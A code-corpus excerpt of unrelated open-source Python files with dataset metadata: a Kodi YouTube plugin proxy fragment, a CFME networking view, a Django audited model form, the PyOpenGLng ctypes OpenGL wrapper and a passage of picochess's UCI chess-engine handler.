self.dash_proxy = get_proxy_server(port=self.proxy_port())
if self.dash_proxy:
self.proxy_thread = threading.Thread(target=self.dash_proxy.serve_forever)
self.proxy_thread.daemon = True
self.proxy_thread.start()
def shutdown_proxy(self):
if self.dash_proxy:
xbmc.log('[plugin.video.youtube] DashProxy: Shutting down |{port}|'.format(port=str(self.old_proxy_port())), xbmc.LOGDEBUG)
self.proxy_port_sync()
self.dash_proxy.shutdown()
self.dash_proxy.socket.close()
self.proxy_thread.join()
self.proxy_thread = None
self.dash_proxy = None
def restart_proxy(self):
xbmc.log('[plugin.video.youtube] DashProxy: Restarting... |{old_port}| -> |{port}|'
.format(old_port=str(self.old_proxy_port()), port=str(self.proxy_port())), xbmc.LOGDEBUG)
self.shutdown_proxy()
self.start_proxy()
def ping_proxy(self):
return is_proxy_live(port=self.proxy_port())
|
gpl-2.0
| -6,832,723,828,920,644,000
| 34.493976
| 135
| 0.590631
| false
| 3.570909
| false
| false
| false
|
jkandasa/integration_tests
|
cfme/infrastructure/networking.py
|
1
|
1954
|
from navmazing import NavigateToAttribute
from widgetastic.widget import View
from widgetastic_patternfly import Dropdown
from cfme.base.ui import BaseLoggedInPage
from cfme.utils.appliance import Navigatable
from cfme.utils.appliance.implementations.ui import navigator, CFMENavigateStep
from widgetastic_manageiq import PaginationPane, ItemsToolBarViewSelector, Text
class InfraNetworking(Navigatable):
def __init__(self, appliance=None):
Navigatable.__init__(self, appliance)
class InfraNetworkingView(BaseLoggedInPage):
"""Base view for header and nav checking, navigatable views should inherit this"""
@property
def in_infra_networking(self):
nav_chain = ['Compute', 'Infrastructure', 'Networking']
return (
self.logged_in_as_current_user and
self.navigation.currently_selected == nav_chain)
class InfraNetworkingToolbar(View):
"""The toolbar on the main page"""
policy = Dropdown('Policy')
view_selector = View.nested(ItemsToolBarViewSelector)
class InfraNetworkingEntities(View):
"""Entities on the main page"""
title = Text('//div[@id="main-content"]//h1')
class InfraNetworkingAllView(InfraNetworkingView):
"""The "all" view -- a list"""
@property
def is_displayed(self):
return (
self.in_infra_networking and
self.entities.title.text == 'All Switches')
toolbar = View.nested(InfraNetworkingToolbar)
entities = View.nested(InfraNetworkingEntities)
paginator = PaginationPane()
@navigator.register(InfraNetworking, 'All')
class All(CFMENavigateStep):
VIEW = InfraNetworkingAllView
prerequisite = NavigateToAttribute('appliance.server', 'LoggedIn')
def step(self):
self.prerequisite_view.navigation.select('Compute', 'Infrastructure', 'Networking')
def resetter(self):
# Reset view and selection
self.view.toolbar.view_selector.select('Grid View')
|
gpl-2.0
| 3,075,071,980,845,760,000
| 30.015873
| 91
| 0.716991
| false
| 3.947475
| false
| false
| false
|
rdkls/django-audit-mongodb
|
djangoaudit/forms.py
|
1
|
1925
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (c) 2010, 2degrees Limited <egoddard@tech.2degreesnetwork.com>.
# All Rights Reserved.
#
# This file is part of djangoaudit <https://launchpad.net/django-audit/>,
# which is subject to the provisions of the BSD at
# <http://dev.2degreesnetwork.com/p/2degrees-license.html>. A copy of the
# license should accompany this distribution. THIS SOFTWARE IS PROVIDED "AS IS"
# AND ANY AND ALL EXPRESS OR IMPLIED WARRANTIES ARE DISCLAIMED, INCLUDING, BUT
# NOT LIMITED TO, THE IMPLIED WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST
# INFRINGEMENT, AND FITNESS FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""
A module to store a version of django.forms.ModelForm to work with
djangoaudit.models.AuditedModel
"""
from django.forms import ModelForm
__all__ = ['AuditedModelForm']
class AuditedModelForm(ModelForm):
"""
A version of django.forms.ModelForm to allow operator and notes to be
specified to work with djangoaudit.models.AuditedModel
"""
def save(self, commit=True, operator=None, notes=None):
"""
Save the data in the form to the audited model instance.
:param commit: Whether to commit (see django docs for more info)
:type commit: :class:`bool`
:param operator: Optional operator to record against this save
:param notes: Optional notes to record against this save
"""
if not hasattr(self.instance, '_audit_info'):
raise AttributeError("Cannot save this form as the model instance "
"does not have the attribute '_audit_info'")
self.instance.set_audit_info(operator=operator, notes=notes)
super(AuditedModelForm, self).save(commit=commit)
|
bsd-3-clause
| -479,323,673,763,812,700
| 36.764706
| 79
| 0.622338
| false
| 4.487179
| false
| false
| false
|
FabriceSalvaire/PyOpenGLng
|
PyOpenGLng/Wrapper/CtypeWrapper.py
|
1
|
33545
|
####################################################################################################
#
# PyOpenGLng - An OpenGL Python Wrapper with a High Level API.
# Copyright (C) 2014 Fabrice Salvaire
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
####################################################################################################
"""This module implements a ctypes wrapper for OpenGL based on information provided by the OpenGL
API :class:`PyOpenGLng.GlApi`.
"""
####################################################################################################
import six
####################################################################################################
import collections
import ctypes
import logging
import os
import subprocess
import sys
import types
import numpy as np
####################################################################################################
from .PythonicWrapper import PythonicWrapper
from PyOpenGLng.Tools.Timer import TimerContextManager
import PyOpenGLng.Config as Config
import PyOpenGLng.GlApi.Getter as Getter
####################################################################################################
_module_logger = logging.getLogger(__name__)
####################################################################################################
# Fixme: unsigned comes from typedef
# not gl, but translated c type in fact
__to_ctypes_type__ = {
'char':ctypes.c_char,
'int8_t':ctypes.c_byte, # c_int8
'uint8_t':ctypes.c_ubyte, # c_uint8
'unsigned char':ctypes.c_ubyte,
'short':ctypes.c_short,
'unsigned short':ctypes.c_ushort,
'int32_t':ctypes.c_int32,
'int':ctypes.c_int32, # not 64-bit integer!
'unsigned int':ctypes.c_uint32,
'int64_t':ctypes.c_int64,
'uint64_t':ctypes.c_uint64,
'float':ctypes.c_float,
'float_t':ctypes.c_float,
'double':ctypes.c_double,
'intptr_t':ctypes.c_void_p, # ?
'ptrdiff_t':ctypes.c_void_p, # int64 ?
'ssize_t':ctypes.c_uint64, # ?
}
__numpy_to_ctypes_type__ = {
'<u1':ctypes.c_uint8,
'<u2':ctypes.c_uint16,
'<u4':ctypes.c_uint32,
'<u8':ctypes.c_uint64,
'<i1':ctypes.c_int8,
'<i2':ctypes.c_int16,
'<i4':ctypes.c_int32,
'<i8':ctypes.c_int64,
'<f4':ctypes.c_float,
'<f8':ctypes.c_double,
}
def to_ctypes_type(parameter):
""" Return the ctypes type corresponding to a parameter. """
if parameter.is_generic_pointer():
return ctypes.c_void_p
else:
c_type = str(parameter.c_type)
return __to_ctypes_type__[c_type]
def numpy_to_ctypes_type(array):
""" Return the ctypes type corresponding to a Numpy array data type. """
return __numpy_to_ctypes_type__.get(array.dtype.str, None)
####################################################################################################
__command_directives__ = {
'glShaderSource':{'length':None,},
# length = NULL for null terminated string and solve len(pointer_parameters) == 2
}
####################################################################################################
def check_numpy_type(array, ctypes_type):
""" Check the Numpy array data type is same as *ctypes_type*. """
if numpy_to_ctypes_type(array) != ctypes_type:
raise ValueError("Type mismatch: %s instead of %s" % (array.dtype, ctypes_type.__name__))
####################################################################################################
class GlEnums(object):
##############################################
def __iter__(self):
for attribute in sorted(six.iterkeys(self.__dict__)):
if attribute.startswith('GL_'):
yield attribute
####################################################################################################
class GlCommands(object):
##############################################
def __iter__(self):
# for attribute, value in self.__dict__.iteritems():
# if attribute.startswith('gl'):
# yield value
for attribute in sorted(six.iterkeys(self.__dict__)):
if attribute.startswith('gl'):
yield getattr(self, attribute)
####################################################################################################
class ParameterWrapperBase(object):
# Fixme: wrapper, translator
""" Base class for parameter wrapper. """
##############################################
def repr_string(self, parameter):
return self.__class__.__name__ + '<' + parameter.format_gl_type() + '> ' + parameter.name
##############################################
def __repr__(self):
return self.repr_string(self._parameter)
####################################################################################################
class ParameterWrapper(ParameterWrapperBase):
""" Translate a fundamental type. """
##############################################
def __init__(self, parameter):
self._parameter = parameter
self._location = parameter.location # Fixme: doublon?
self._type = to_ctypes_type(parameter)
##############################################
def from_python(self, parameter, c_parameters):
c_parameters[self._location] = self._type(parameter)
return None
####################################################################################################
class PointerWrapper(ParameterWrapperBase):
""" Translate a pointer.
This wrapper handle all the case which are not managed by a :class:`ReferenceWrapper`, an
:class:`InputArrayWrapper` or an :class:`OutputArrayWrapper`.
These parameters are identified in the prototype as a pointer that doesn't have a size parameter
or a computed size.
If the pointer type is *char* then user must provide a string or a Python object with a
:meth:`__str__` method, else a Numpy array must be provided and the data type is only checked if
the pointer is not generic.
If the parameter value is :obj:`None`, the value is passed as is.
"""
_logger = _module_logger.getChild('PointerWrapper')
##############################################
def __init__(self, parameter):
# Fixme: same as ...
self._parameter = parameter
self._location = parameter.location
self._type = to_ctypes_type(parameter)
##############################################
def from_python(self, parameter, c_parameters):
if self._type == ctypes.c_char and self._parameter.const: # const char *
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('const char *')
if not isinstance(parameter, bytes):
parameter = six.b(parameter)
ctypes_parameter = ctypes.c_char_p(parameter)
elif isinstance(parameter, np.ndarray):
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('ndarray')
if self._type != ctypes.c_void_p:
check_numpy_type(parameter, self._type)
ctypes_parameter = parameter.ctypes.data_as(ctypes.POINTER(self._type))
elif parameter is None:
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('None')
ctypes_parameter = None # already done
else:
raise NotImplementedError
c_parameters[self._location] = ctypes_parameter
return None
####################################################################################################
class ReferenceWrapper(ParameterWrapperBase):
""" Translate a parameter passed by reference.
A parameter passed by reference is identified in the prototype as a non const pointer of a fixed
size of 1.
A reference parameter is removed in the Python prototype and the value set by the command is
pushed out in the return.
"""
##############################################
def __init__(self, parameter):
# Fixme: same as ...
self._parameter = parameter
self._location = parameter.location
self._type = to_ctypes_type(parameter)
##############################################
def from_python(self, c_parameters):
ctypes_parameter = self._type()
c_parameters[self._location] = ctypes.byref(ctypes_parameter)
to_python_converter = ValueConverter(ctypes_parameter)
return to_python_converter
####################################################################################################
class ArrayWrapper(ParameterWrapperBase):
""" Base class for Array Wrapper. """
##############################################
def __init__(self, size_parameter):
# Fixme: size_multiplier
# excepted some particular cases
pointer_parameter = size_parameter.pointer_parameters[0]
# Fixme: for debug
self._size_parameter = size_parameter
self._pointer_parameter = pointer_parameter
self._size_location = size_parameter.location
self._size_type = to_ctypes_type(size_parameter)
self._pointer_location = pointer_parameter.location
self._pointer_type = to_ctypes_type(pointer_parameter)
##############################################
def __repr__(self):
return self.repr_string(self._pointer_parameter)
####################################################################################################
class OutputArrayWrapper(ArrayWrapper):
""" Translate an output array parameter.
If the pointer is generic, then the array is passed as an Numpy array and the size is specified
in byte. <<CHECK>>
If the pointer is of \*char type, then the size is passed by the user and a string is returned.
If the user passes an Numpy array, then the data type is checked and the size is set by the
wrapper.
If the user passes a size, then a Numpy (or a list) array is created and returned.
<<size_parameter_threshold>>
"""
_logger = _module_logger.getChild('OutputArrayWrapper')
size_parameter_threshold = 20
##############################################
def from_python(self, parameter, c_parameters):
# print self._pointer_parameter.long_repr(), self._pointer_type, type(parameter)
if self._pointer_type == ctypes.c_void_p:
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('void *')
# Generic pointer: thus the array data type is not specified by the API
if isinstance(parameter, np.ndarray):
# The output array is provided by user and the size is specified in byte
array = parameter
c_parameters[self._size_location] = self._size_type(array.nbytes)
ctypes_parameter = array.ctypes.data_as(ctypes.c_void_p)
c_parameters[self._pointer_location] = ctypes_parameter
return None
else:
raise NotImplementedError
elif self._pointer_type == ctypes.c_char:
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('char *')
# The array size is provided by user
size_parameter = parameter
c_parameters[self._size_location] = self._size_type(size_parameter)
ctypes_parameter = ctypes.create_string_buffer(size_parameter)
c_parameters[self._pointer_location] = ctypes_parameter
to_python_converter = StringConverter(ctypes_parameter)
return to_python_converter
elif isinstance(parameter, np.ndarray):
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('ndarray')
# Typed pointer
# The output array is provided by user
array = parameter
check_numpy_type(array, self._pointer_type)
c_parameters[self._size_location] = self._size_type(array.size)
ctypes_parameter = array.ctypes.data_as(ctypes.POINTER(self._pointer_type))
c_parameters[self._pointer_location] = ctypes_parameter
return None
else:
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('else')
# Typed pointer
# The array size is provided by user
size_parameter = parameter
c_parameters[self._size_location] = self._size_type(size_parameter)
if size_parameter >= self.size_parameter_threshold:
array = np.zeros((size_parameter), dtype=self._pointer_type)
ctypes_parameter = array.ctypes.data_as(ctypes.POINTER(self._pointer_type))
to_python_converter = IdentityConverter(array)
else:
array_type = self._pointer_type * size_parameter
ctypes_parameter = array_type()
to_python_converter = ListConverter(ctypes_parameter)
c_parameters[self._pointer_location] = ctypes_parameter
return to_python_converter
####################################################################################################
class InputArrayWrapper(ArrayWrapper):
_logger = _module_logger.getChild('InputArrayWrapper')
##############################################
def from_python(self, array, c_parameters):
# print array
# print self._pointer_parameter.long_repr()
# print self._pointer_type
if self._pointer_parameter.pointer == 2:
if self._pointer_type == ctypes.c_char: # Fixme: should be c_char_p
if isinstance(array, str):
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('string -> const char **')
size_parameter = 1
string_array_type = ctypes.c_char_p * 1
string_array = string_array_type(ctypes.c_char_p(six.b(array)))
else:
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('string array -> const char **')
size_parameter = len(array)
string_array_type = ctypes.c_char_p * size_parameter
string_array = string_array_type(*[ctypes.c_char_p(x) for x in array])
ctypes_parameter = string_array
else:
raise NotImplementedError
elif isinstance(array, np.ndarray):
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('ndarray')
if self._pointer_type == ctypes.c_void_p:
size_parameter = array.nbytes
elif self._pointer_type == ctypes.c_float: # fixme
size_parameter = 1 # array.shape[0]
# else:
# size_parameter = array.nbytes
# ctypes_parameter = array.ctypes.data_as(ctypes.c_void_p)
ctypes_parameter = array.ctypes.data_as(ctypes.POINTER(self._pointer_type))
elif isinstance(array, collections.Iterable):
size_parameter = len(array)
array_type = self._pointer_type * size_parameter
if six.PY3:
if size_parameter > 1:
ctypes_parameter = array_type(array)
else:
ctypes_parameter = array_type(array[0])
else:
ctypes_parameter = array_type(array)
else:
raise ValueError(str(array))
c_parameters[self._size_location] = self._size_type(size_parameter)
c_parameters[self._pointer_location] = ctypes_parameter
return None
####################################################################################################
class ToPythonConverter(object):
""" Base class for C to Python converter. """
##############################################
def __init__(self, c_object):
""" The parameter *c_object* is a ctype object. """
self._c_object = c_object
####################################################################################################
class IdentityConverter(ToPythonConverter):
""" Identity converter. """
def __call__(self):
return self._c_object
class ListConverter(ToPythonConverter):
""" Convert the C object to a Python list. """
def __call__(self):
return list(self._c_object)
class ValueConverter(ToPythonConverter):
""" Get the Python value of the ctype object. """
def __call__(self):
return self._c_object.value
class StringConverter(ToPythonConverter):
""" Get the Python value of the ctype object. """
def __call__(self):
value = self._c_object.value
if value is not None:
return value.decode('ascii')
else:
return None
####################################################################################################
class CommandNotAvailable(Exception):
pass
####################################################################################################
class GlCommandWrapper(object):
_logger = _module_logger.getChild('GlCommandWrapper')
##############################################
def __init__(self, wrapper, command):
self._wrapper = wrapper
self._command = command
self._number_of_parameters = command.number_of_parameters
self._call_counter = 0
try:
self._function = getattr(self._wrapper.libGL, str(command))
except AttributeError:
raise CommandNotAvailable("OpenGL function %s was no found in libGL" % (str(command)))
# Only for simple prototype
# argument_types = [to_ctypes_type(parameter) for parameter in command.parameters]
# if argument_types:
# self._function.argtypes = argument_types
command_directive = __command_directives__.get(str(command), None)
self._parameter_wrappers = []
self._reference_parameter_wrappers = []
for parameter in command.parameters:
if parameter.type in ('GLsync', 'GLDEBUGPROC'):
raise NotImplementedError
parameter_wrapper = None
if command_directive and parameter.name in command_directive:
# Fixme: currently used for unspecified parameters (value set to 0)
pass # skip and will be set to None
elif parameter.pointer:
if parameter.size_parameter is None and parameter.array_size == 1:
# not const, array_size = 1 must be sufficient
parameter_wrapper = ReferenceWrapper(parameter)
elif parameter.size_parameter is None or parameter.computed_size:
parameter_wrapper = PointerWrapper(parameter)
else:
pass # skip and will be set by pointer parameter
elif parameter.pointer_parameters: # size parameter
# Fixme: len(pointer_parameters) > 1
# Only theses functions have len(pointer_parameters) > 1
# glAreTexturesResident
# glGetDebugMessageLog
# glPrioritizeTextures
# glShaderSource
pointer_parameter = parameter.pointer_parameters[0]
if pointer_parameter.const:
parameter_wrapper = InputArrayWrapper(parameter)
else:
parameter_wrapper = OutputArrayWrapper(parameter)
else:
parameter_wrapper = ParameterWrapper(parameter)
if parameter_wrapper is not None:
if isinstance(parameter_wrapper, ReferenceWrapper):
parameter_list = self._reference_parameter_wrappers
else:
parameter_list = self._parameter_wrappers
parameter_list.append(parameter_wrapper)
return_type = command.return_type
if return_type.type == 'GLsync':
raise NotImplementedError
elif return_type.type != 'void': # Fixme: .type or .c_type?
# Fixme: -> to func?
ctypes_type = to_ctypes_type(return_type)
if return_type.pointer:
if ctypes_type == ctypes.c_ubyte: # return type is char *
ctypes_type = ctypes.c_char_p
else:
raise NotImplementedError
self._function.restype = ctypes_type
self._return_void = False
else:
self._function.restype = None
self._return_void = True # Fixme: required or doublon?
# Getter
if command.name in Getter.commands_dict:
command_dict = Getter.commands_dict[command.name]
self._getter = {}
for enum, type_and_size in six.iteritems(command_dict):
try:
enum_value = getattr(wrapper.enums, enum)
self._getter[enum_value] = type_and_size
except AttributeError:
self._logger.warn("Enum {} not found".format(enum))
manual_page = self._manual_page()
if manual_page is not None:
doc = '%s - %s\n\n' % (self._command, manual_page.purpose)
else:
doc = ''
parameter_doc = ', '.join([repr(parameter_wrapper) for parameter_wrapper in self._parameter_wrappers])
self.__doc__ = doc + "%s (%s)" % (self._command, parameter_doc)
##############################################
def __call__(self, *args, **kwargs):
self._call_counter += 1
if len(self._parameter_wrappers) != len(args):
self._logger.warn("%s requires %u arguments, but %u was given\n %s\n %s",
str(self._command), len(self._parameter_wrappers), len(args),
self._command.prototype(),
str([parameter_wrapper.__class__.__name__
for parameter_wrapper in self._parameter_wrappers]))
# Initialise the input/output parameter array
c_parameters = [None]*self._number_of_parameters
to_python_converters = []
# Set the input parameters and append python converters for output
# first process the given parameters
for parameter_wrapper, parameter in zip(self._parameter_wrappers, args):
to_python_converter = parameter_wrapper.from_python(parameter, c_parameters)
if to_python_converter is not None:
to_python_converters.append(to_python_converter)
# second process the parameters by reference
for parameter_wrapper in self._reference_parameter_wrappers:
to_python_converter = parameter_wrapper.from_python(c_parameters)
if to_python_converter is not None:
to_python_converters.append(to_python_converter)
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('Call\n'
' ' + self._command.prototype() + '\n'
' ' + str([parameter_wrapper.__class__.__name__
for parameter_wrapper in self._parameter_wrappers]) + '\n'
' ' + str(c_parameters) + '\n'
' ' + str([to_python_converter.__class__.__name__
for to_python_converter in to_python_converters])
)
result = self._function(*c_parameters)
# Check error
if kwargs.get('check_error', False):
self._wrapper.check_error()
# Manage return
if to_python_converters:
output_parameters = [to_python_converter() for to_python_converter in to_python_converters]
if self._return_void:
# Extract uniq element
# Fixme: to func?, gives some cases to explain
if len(output_parameters) == 1:
output_parameter = output_parameters[0]
if isinstance(output_parameter, list) and len(output_parameter) == 1: # uniq output parameter is [a,]
# Fixme: could be worst than simpler, if we really expect a list
return output_parameter[0]
else:
return output_parameter
else:
return output_parameters
else:
return [result] + output_parameters
else:
if not self._return_void:
return result
##############################################
def __repr__(self):
return str(self._command.name) + ' ' + str(self._function.argtypes) + ' -> ' + str(self._function.restype)
##############################################
def _manual_page(self):
command_name = str(self._command)
for name in ['man' + str(i) for i in range(4, 1, -1)]:
# Fixme: use API version mapping
manual = self._wrapper._manuals[name]
if command_name in manual:
return manual[command_name]
else:
return None
##############################################
def _xml_manual_name(self):
# some commands are merged together: e.g. glVertexAttrib.xml
page = self._manual_page()
if page is not None:
page_name = page.page_name
else:
page_name = str(self._command)
return page_name + '.xml'
##############################################
def xml_manual_path(self):
return os.path.join(Config.Path.manual_path(self._wrapper.api_number), self._xml_manual_name())
##############################################
def xml_manual_url(self, local=False):
if local:
return 'file://' + self.xml_manual_path()
else:
return 'http://www.opengl.org/sdk/docs/man/xhtml/' + self._xml_manual_name()
##############################################
def manual(self, local=False):
if sys.platform.startswith('linux'):
url = self.xml_manual_url(local)
browser = 'xdg-open'
subprocess.Popen([browser, url])
# import webbrowser
# webbrowser.open(url)
else:
raise NotImplementedError
##############################################
def help(self):
# Fixme: help(instance)
print(self.__doc__)
##############################################
@property
def call_counter(self):
return self._call_counter
##############################################
def reset_call_counter(self):
self._call_counter = 0
####################################################################################################
class CtypeWrapper(object):
libGL = None
_logger = _module_logger.getChild('CtypeWrapper')
##############################################
@classmethod
def load_library(cls, libGL_name):
cls.libGL = ctypes.cdll.LoadLibrary(libGL_name)
cls.libGL.glGetString.restype = ctypes.c_char_p
GL_VERSION = int('0x1F02', 16)
version_string = cls.libGL.glGetString(GL_VERSION)
if version_string is not None:
version_string = version_string.decode('ascii')
return version_string
##############################################
def __init__(self, gl_spec, api, api_number, profile=None, manuals=None):
# self._gl_spec = gl_spec
self.api_number = api_number
self._manuals = manuals
with TimerContextManager(self._logger, 'generate_api'):
api_enums, api_commands = gl_spec.generate_api(api, api_number, profile) # 0.080288 s
self._init_enums(api_enums)
self._init_commands(api_commands)
#!# self._pythonic_wrapper = PythonicWrapper(self)
##############################################
def _init_enums(self, api_enums):
gl_enums = GlEnums()
reverse_enums = {}
for enum in api_enums:
# We don't provide more information on enumerants, use GlAPI instead
enum_name, enum_value = str(enum), int(enum)
# store enumerants and commands at the same level
setattr(self, enum_name, enum_value)
# store enumerants in a dedicated place
setattr(gl_enums, enum_name, enum_value)
reverse_enums[enum_value] = enum_name
self.enums = gl_enums
self.reverse_enums = reverse_enums
##############################################
def _init_commands(self, api_commands):
gl_commands = GlCommands()
for command in six.itervalues(api_commands):
try:
command_name = str(command)
command_wrapper = GlCommandWrapper(self, command)
# store enumerants and commands at the same level
if hasattr(PythonicWrapper, command_name):
method = getattr(PythonicWrapper, command_name)
if six.PY3:
rebinded_method = types.MethodType(method, self)
else:
rebinded_method = types.MethodType(method.__func__, self, self.__class__)
setattr(self, command_name, rebinded_method)
else:
setattr(self, command_name, command_wrapper)
# store commands in a dedicated place
setattr(gl_commands, command_name, command_wrapper)
except NotImplementedError:
self._logger.warn("Command %s is not supported by the wrapper", str(command))
except CommandNotAvailable:
self._logger.warn("Command %s is not implemented by the vendor", str(command))
self.commands = gl_commands
##############################################
def check_error(self):
error_code = self.glGetError()
if error_code:
error_message = self._error_code_message(error_code)
raise NameError(error_message)
##############################################
def _error_code_message(self, error_code):
if not error_code:
# GL_NO_ERROR: The value of this symbolic constant is guaranteed to be 0.
return 'No error has been recorded.'
else:
if error_code == self.GL_INVALID_ENUM:
return 'An unacceptable value is specified for an enumerated argument.'
elif error_code == self.GL_INVALID_VALUE:
return 'A numeric argument is out of range.'
elif error_code == self.GL_INVALID_OPERATION:
return 'The specified operation is not allowed in the current state.'
elif error_code == self.GL_INVALID_FRAMEBUFFER_OPERATION:
return 'The framebuffer object is not complete.'
elif error_code == self.GL_OUT_OF_MEMORY:
return 'There is not enough memory left to execute the command.'
elif error_code == self.GL_STACK_UNDERFLOW:
return 'An attempt has been made to perform an operation that would cause an internal stack to underflow.'
elif error_code == self.GL_STACK_OVERFLOW:
return 'An attempt has been made to perform an operation that would cause an internal stack to overflow.'
else:
raise NotImplementedError
##############################################
def error_checker(self):
return ErrorContextManager(self)
##############################################
def called_commands(self):
return [command for command in self.commands if command.call_counter]
##############################################
def reset_call_counter(self):
for command in self.commands:
command.reset_call_counter()
####################################################################################################
class ErrorContextManager(object):
##############################################
def __init__(self, wrapper):
self._wrapper = wrapper
##############################################
def __enter__(self):
pass
##############################################
def __exit__(self, type_, value, traceback):
self._wrapper.check_error()
####################################################################################################
#
# End
#
####################################################################################################
|
gpl-3.0
| 1,990,613,322,482,558,700
| 36.606502
| 122
| 0.515397
| false
| 4.786672
| false
| false
| false
|
LocutusOfPenguin/picochess
|
uci/engine.py
|
1
|
9818
|
# Copyright (C) 2013-2018 Jean-Francois Romang (jromang@posteo.de)
# Shivkumar Shivaji ()
# Jürgen Précour (LocutusOfPenguin@posteo.de)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import logging
import os
import configparser
import spur
import paramiko
from subprocess import DEVNULL
from dgt.api import Event
from utilities import EvtObserver
import chess.uci
from chess import Board
from uci.informer import Informer
from uci.read import read_engine_ini
class UciShell(object):
"""Handle the uci engine shell."""
def __init__(self, hostname=None, username=None, key_file=None, password=None):
super(UciShell, self).__init__()
if hostname:
logging.info('connecting to [%s]', hostname)
if key_file:
self.shell = spur.SshShell(hostname=hostname, username=username, private_key_file=key_file,
missing_host_key=paramiko.AutoAddPolicy())
else:
self.shell = spur.SshShell(hostname=hostname, username=username, password=password,
missing_host_key=paramiko.AutoAddPolicy())
else:
self.shell = None
def get_spur(self):
return self.shell
class UciEngine(object):
"""Handle the uci engine communication."""
def __init__(self, file: str, uci_shell: UciShell, home=''):
super(UciEngine, self).__init__()
try:
self.shell = uci_shell.get_spur()
if home:
file = home + os.sep + file
if self.shell:
self.engine = chess.uci.spur_spawn_engine(self.shell, [file])
else:
self.engine = chess.uci.popen_engine(file, stderr=DEVNULL)
self.file = file
if self.engine:
handler = Informer()
self.engine.info_handlers.append(handler)
self.engine.uci()
else:
logging.error('engine executable [%s] not found', file)
self.options = {}
self.future = None
self.show_best = True
self.res = None
self.level_support = False
self.installed_engines = read_engine_ini(self.shell, (file.rsplit(os.sep, 1))[0])
except OSError:
logging.exception('OS error in starting engine')
except TypeError:
logging.exception('engine executable not found')
def get_name(self):
"""Get engine name."""
return self.engine.name
def get_options(self):
"""Get engine options."""
return self.engine.options
def option(self, name, value):
"""Set OptionName with value."""
self.options[name] = value
def send(self):
"""Send options to engine."""
logging.debug('setting engine with options %s', self.options)
self.engine.setoption(self.options)
def has_levels(self):
"""Return engine level support."""
has_lv = self.has_skill_level() or self.has_handicap_level() or self.has_limit_strength() or self.has_strength()
return self.level_support or has_lv
def has_skill_level(self):
"""Return engine skill level support."""
return 'Skill Level' in self.engine.options
def has_handicap_level(self):
"""Return engine handicap level support."""
return 'Handicap Level' in self.engine.options
def has_limit_strength(self):
"""Return engine limit strength support."""
return 'UCI_LimitStrength' in self.engine.options
def has_strength(self):
"""Return engine strength support."""
return 'Strength' in self.engine.options
def has_chess960(self):
"""Return chess960 support."""
return 'UCI_Chess960' in self.engine.options
def has_ponder(self):
"""Return ponder support."""
return 'Ponder' in self.engine.options
def get_file(self):
"""Get File."""
return self.file
def get_installed_engines(self):
"""Get installed engines."""
return self.installed_engines
def position(self, game: Board):
"""Set position."""
self.engine.position(game)
def quit(self):
"""Quit engine."""
if self.engine.quit(): # Ask nicely
if self.engine.terminate(): # If you won't go nicely....
if self.engine.kill(): # Right that does it!
return False
return True
def uci(self):
"""Send start uci command."""
self.engine.uci()
def stop(self, show_best=False):
"""Stop engine."""
logging.info('show_best old: %s new: %s', self.show_best, show_best)
self.show_best = show_best
if self.is_waiting():
logging.info('engine already stopped')
return self.res
try:
self.engine.stop()
except chess.uci.EngineTerminatedException:
logging.error('Engine terminated') # @todo find out, why this can happen!
return self.future.result()
def go(self, time_dict: dict):
"""Go engine."""
self.show_best = True
time_dict['async_callback'] = self.callback
# Observable.fire(Event.START_SEARCH())
self.future = self.engine.go(**time_dict)
return self.future
def ponder(self):
"""Ponder engine."""
self.show_best = False
# Observable.fire(Event.START_SEARCH())
self.future = self.engine.go(ponder=True, infinite=True, async_callback=self.callback)
return self.future
def brain(self, time_dict: dict):
"""Permanent brain."""
self.show_best = True
time_dict['ponder'] = True
time_dict['async_callback'] = self.callback3
# Observable.fire(Event.START_SEARCH())
self.future = self.engine.go(**time_dict)
return self.future
def hit(self):
"""Send a ponder hit."""
logging.info('show_best: %s', self.show_best)
self.engine.ponderhit()
self.show_best = True
def callback(self, command):
"""Callback function."""
try:
self.res = command.result()
except chess.uci.EngineTerminatedException:
logging.error('Engine terminated') # @todo find out, why this can happen!
self.show_best = False
logging.info('res: %s', self.res)
# Observable.fire(Event.STOP_SEARCH())
if self.show_best and self.res:
EvtObserver.fire(Event.BEST_MOVE(move=self.res.bestmove, ponder=self.res.ponder, inbook=False))
else:
logging.info('event best_move not fired')
def callback3(self, command):
"""Callback function."""
try:
self.res = command.result()
except chess.uci.EngineTerminatedException:
logging.error('Engine terminated') # @todo find out, why this can happen!
self.show_best = False
logging.info('res: %s', self.res)
# Observable.fire(Event.STOP_SEARCH())
if self.show_best and self.res:
EvtObserver.fire(Event.BEST_MOVE(move=self.res.bestmove, ponder=self.res.ponder, inbook=False))
else:
logging.info('event best_move not fired')
def is_thinking(self):
"""Engine thinking."""
return not self.engine.idle and not self.engine.pondering
def is_pondering(self):
"""Engine pondering."""
return not self.engine.idle and self.engine.pondering
def is_waiting(self):
"""Engine waiting."""
return self.engine.idle
def newgame(self, game: Board):
